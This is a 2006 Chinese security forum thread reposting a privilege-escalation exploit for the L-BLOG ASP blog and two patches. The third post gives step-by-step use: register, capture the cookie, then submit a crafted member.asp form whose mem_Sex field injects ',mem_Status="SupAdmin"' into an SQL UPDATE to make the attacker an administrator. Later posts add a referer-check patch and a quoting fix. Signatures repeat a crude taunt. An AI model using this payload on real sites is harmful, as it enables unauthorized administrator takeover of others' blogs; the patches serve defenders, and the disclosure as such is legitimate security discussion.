‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]L-BLOG最新提权漏洞利用程序与补丁

大大马甲 该用户已被删除
楼主 发表于 2006-1-10 00:49  只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

TOP

unusual

晶莹剔透§烈日灼然

Rank: 1

帖子
17 
精华
0 
积分
71 
阅读权限
40 
在线时间
71 小时 
注册时间
2005-2-15 
最后登录
2008-6-20 
沙发 发表于 2006-1-10 01:55  只看该作者
我也汗了跨站好象不是这么定义的吧?

TOP

yezhan

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
146 
精华
0 
积分
471 
阅读权限
100 
性别
男 
在线时间
35 小时 
注册时间
2005-6-14 
最后登录
2008-5-10 
椅子 发表于 2006-1-10 05:40  只看该作者

[转载]L-BLOG最新提权漏洞利用程序与补丁

信息来源:http://okhtm.com/article.asp?id=464


申明
引用:
程序是 firefox出的,大家看图,自己过去下.漏洞文章是http://blog.365hello.com/转的

补丁是im286的smnh发的
以下为我整理的:

打开目标Blog,注册一个ID,注册后会自动登陆;
登陆后进入“用户中心 - 修改资料”,此时要运行“WSockExpert”来抓取Cookie,在“编辑个人资料”处填入“旧密码”,其他的什么都不要填,直接点击“确定编辑”,这时“WSockExpert”已抓取到了Cookie,复制下来;
运行程序,填入该目标Blog的地址、刚才抓取到的Cookie以及你注册时的密码,点击“提交”,待状态栏提示“数据提交完毕,请重新登陆!”后,重新登陆Blog,你注册的ID即提升为管理员。



漏洞还不只是限制在1.08~~L-Blog V1.10 AIO 版也一样可以搞定~~

member.asp文件
引用:
<html>
<head>
</head>
<body>
<table width="768" border="0" align="center" cellpadding="4" cellspacing="6" background="images/blog_main.gif">
<tr>
<td width="128" align="center"><strong>用户编辑</strong></td>
<td valign="top" align="center"><table width="95%" border="0" cellpadding="4" cellspacing="1" bgcolor="#CCCCCC">
<tr bgcolor="#EFEFEF">
<td colspan="2"><b>编辑个人资料</b></td>
</tr>
<tr bgcolor="#FFFFFF"><form action="http://url/member.asp?action=edit&edit=post" method="post" name="Submit" id="Submit">
<td width="98" align="right" nowrap>名称:</td>
<td width="100%"> 9xiao</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>旧密码:</td>
<td> <input name="mem_OldPassword" type="password" id="mem_OldPassword" size="16">
<span class="htd"><b><font color="#FF0000"> *</font></b> 修改资料必须输入原密码</span></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>新密码:</td>
<td> <input name="mem_NewPassword" type="password" id="mem_NewPassword" size="16">
<span class="htd"><b><font color="#FF0000">*</font></b> 密码必须是6-16位</span></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>确认密码:</td>
<td> <input name="mem_RePassword" type="password" id="mem_RePassword" size="16"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>性别:</td>
<td><input name="mem_Sex" type="text" size="36" value=0,mem_Status="SupAdmin" ></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>邮箱:</td>
<td> <input name="mem_Email" type="text" id="mem_Email" value="pyadong at 263 dot net" size="30">
  
<input name="mem_HideEmail" type="checkbox" id="mem_HideEmail" value="1" >
隐藏邮箱</td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>腾讯QQ:</td>
<td> <input name="mem_QQ" type="text" id="mem_QQ" value=""></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>个人主页:</td>
<td> <input name="mem_HomePage" type="text" id="mem_HomePage" value="" size="35"></td>
</tr>
<tr bgcolor="#FFFFFF">
<td align="right" nowrap>个人简介:</td>
<td> <textarea name="mem_Intro" cols="50" rows="5" wrap="VIRTUAL" id="mem_Intro"></textarea></td>
</tr>
<tr align="center" bgcolor="#FFFFFF">
<td colspan="2">
<input type="submit" name="Submit" value=" 确定编辑 ">
</td>
</tr></form>
</table></td>
</tr>
</table></body>
</html>

action="http://url/member.asp?action=edit&edit=post" 替换为目标url,1.10版本抓包修改mem_Sex值为“0,mem_Status="SupAdmin"”
补丁程序:
引用:
member.asp文件

<!--#include file="commond.asp" -->
<!--#include file="include/function.asp" -->
<!--#include file="include/md5code.asp" -->
<!--#include file="include/ubbcode.asp" -->
<!--#include file="header.asp" -->
&#39;在这里添加上下面部分
&#39;====================

<%
dim server_v1,server_v2
server_v1=Cstr(Request.ServerVariables("HTTP_REFERER"))
server_v2=Cstr(Request.ServerVariables("SERVER_NAME"))
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<meta http-equiv=Content-Type content=""text/html; charset=utf-8"" /><center><div align=""center"" style=""width:400px;height:100px;padding: 8px;font-size:9pt;border: 1px solid ThreeDShadow;POSITION:absolute;top:expression((document.body.offsetHeight-100)/2);left:expression((document.body.offsetWidth-400)/2);""><table width=""100%"" height=""100%"" style=""font-size:12px;""><tr><td align=""center"">你提交的路径有误,禁止从站点外部提交数据请不要乱该参数!</td></tr></table></div>"
response.end
end if
%>

&#39;====================
完毕
<%IF Request.QueryString("action")="edit" AND memName<>Empty Then%>
不想说什么了,又是跨站.大家做asp程序需要注意一下了.
觉得你够三八吗? 觉得你有资格和我挑吗? 那就到八里街XX洗头店找 老板娘单挑吧 活着回来的找我 http://Www.OkHtm.Com ---------------------------------------------------------- 不要看俺了,俺只是来学习的 学习你们的三八精神的.

TOP

yezhan

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
146 
精华
0 
积分
471 
阅读权限
100 
性别
男 
在线时间
35 小时 
注册时间
2005-6-14 
最后登录
2008-5-10 
板凳 发表于 2006-1-10 05:47  只看该作者
没记错的话这个是lblog第二个跨站漏洞了```
觉得你够三八吗? 觉得你有资格和我挑吗? 那就到八里街XX洗头店找 老板娘单挑吧 活着回来的找我 http://Www.OkHtm.Com ---------------------------------------------------------- 不要看俺了,俺只是来学习的 学习你们的三八精神的.

TOP

smnh

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
0 小时 
注册时间
2006-1-11 
最后登录
2006-1-20 
地板 发表于 2006-1-11 15:39  只看该作者
最根本的补丁

member.asp
找到这段
引用:
Conn.ExeCute("UPDATE blog_Member SET mem_Sex="&CheckStr(Request.Form("mem_Sex"))&",mem_Email=&#39;"&CheckStr(Request.Form("mem_Email"))&"&#39;,mem_HideEmail="&mem_HideEmail&",mem_QQ=&#39;"&CheckStr(Request.Form("mem_QQ"))&"&#39;,mem_HomePage=&#39;"&CheckStr(Request.Form("mem_HomePage"))&"&#39;,mem_Intro=&#39;"&CheckStr(Request.Form("mem_Intro"))&"&#39;"&SQL_Add&" WHERE mem_Name=&#39;"&memName&"&#39;")
引用:
mem_Sex="&CheckStr(Request.Form("mem_Sex"))&",
修改为
引用:
mem_Sex=&#39;"&CheckStr(Request.Form("mem_Sex"))&"&#39;,

TOP

yezhan

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
146 
精华
0 
积分
471 
阅读权限
100 
性别
男 
在线时间
35 小时 
注册时间
2005-6-14 
最后登录
2008-5-10 
6楼 发表于 2006-1-11 21:14  只看该作者
挖靠````

刚想起来自己说错了```

是站外提交
觉得你够三八吗? 觉得你有资格和我挑吗? 那就到八里街XX洗头店找 老板娘单挑吧 活着回来的找我 http://Www.OkHtm.Com ---------------------------------------------------------- 不要看俺了,俺只是来学习的 学习你们的三八精神的.

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题